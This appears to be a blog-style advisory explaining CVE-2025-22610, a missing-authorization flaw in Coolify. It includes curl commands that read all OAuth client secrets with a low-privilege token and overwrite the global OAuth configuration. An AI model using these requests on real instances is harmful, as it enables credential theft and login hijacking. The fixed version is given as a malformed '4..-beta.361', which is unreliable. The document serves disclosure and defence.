CVE-2025-22610 - Unauthorized Access to OAuth Secrets in Coolify (Explained and Exploited)
Coolify is an open-source and self-hostable platform that helps developers manage servers, applications, and databases—kind of like your all-in-one digital Swiss Army knife. But up until version 4..-beta.361, Coolify had a big security hole. Any logged-in user—even those with the lowest level of access—could read and change the global OAuth configuration. This included very sensitive information: the Client ID and, worse, the Client Secret for all custom OAuth providers!
Sounds scary? Let’s break it down step by step, including how this happened, how it can be exploited, and how you can protect yourself.
What is CVE-2025-22610?
CVE-2025-22610 is a critical security flaw in Coolify (prior to 4..-beta.361) where authorization checks were missing. Any authenticated user could:
See client ID and the sensitive client secret for every custom OAuth provider.
- Modify these settings, changing the identity/authentication flows for all other users.
Technical Details of the Vulnerability
This problem boils down to missing authorization. The API endpoint responsible for managing OAuth configurations simply didn’t check if the requesting user had admin rights or special permissions.
Suppose a Coolify instance is running on https://coolify.my-company.com. Any user (even a basic one) logged into their account could fire a request to an endpoint like:
GET /api/v1/settings/oauth
And Coolify would respond with the entire OAuth configuration—including secrets.
Here’s what a request and response might look like
GET /api/v1/settings/oauth
Authorization: Bearer <valid-user-token>
And the response (simplified)
{
"providers": [
{
"name": "GitHub",
"clientId": "xxxxxxxxxxxxxx",
"clientSecret": "super-secret-abcdefg"
},
...
]
}
This *should* only be available to high-trust admins. Instead, everyone with an account could see it.
Exploiting CVE-2025-22610: A Step-by-Step Example
Disclaimer: This is for educational purposes only. Never attack systems you don't own or have explicit permission to test.
Access to the web UI or the API via your browser or curl.
Let’s say I’m bob@company.com with minimal rights.
1. Log In and Grab Your Session Token
Use browser dev tools or curl to get your session token.
2. Send the Vulnerable API Request
curl -X GET https://coolify.my-company.com/api/v1/settings/oauth \
-H "Authorization: Bearer <your-access-token>"
3. Read All the Secrets
The response will include JSON with clientSecret values for every custom OAuth provider. With this info, you could impersonate the OAuth app elsewhere or sabotage authentication flows.
4. (Optional) Modify Global OAuth Config
You could even update the global config! Here’s how you’d change the client secret for the GitHub provider:
curl -X PATCH https://coolify.my-company.com/api/v1/settings/oauth \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <your-access-token>" \
-d '{"providers":[{"name":"GitHub","clientId":"newid","clientSecret":"hacked-secret"}]}'
Every login using GitHub (via OAuth) would now break—or route through your secret.
Why This Is So Dangerous
- Secrets Leak: OAuth client secrets are as sensitive as database passwords. With these, attackers can register their own apps or phish users.
Wide Access: Any authenticated user could do this.
- Config Tampering: Attackers could break access for everyone, or even redirect logins to their own infrastructure.
The Fix: Upgrade to Coolify 4..-beta.361 or Later
The developers fixed this in version 4..-beta.361. Now, only proper admins can access and modify OAuth secrets.
If you run Coolify, upgrade now. Secrets for your OAuth providers may already have been leaked—rotate any exposed credentials as a precaution.
References
- Original GitHub Advisory (GHSA-pwxx-8pw2-8c3g)
- NPM Advisory Database: CVE-2025-22610
- Coolify Releases
Fix: Upgrade, rotate secrets, audit user access.
If you're using Coolify, update ASAP and check for any suspicious account activity. Stay safe! 🚨
*Exclusive analysis by ChatGPT. Please credit if sharing or quoting.*
Timeline
Published on: 01/24/2025 17:15:15 UTC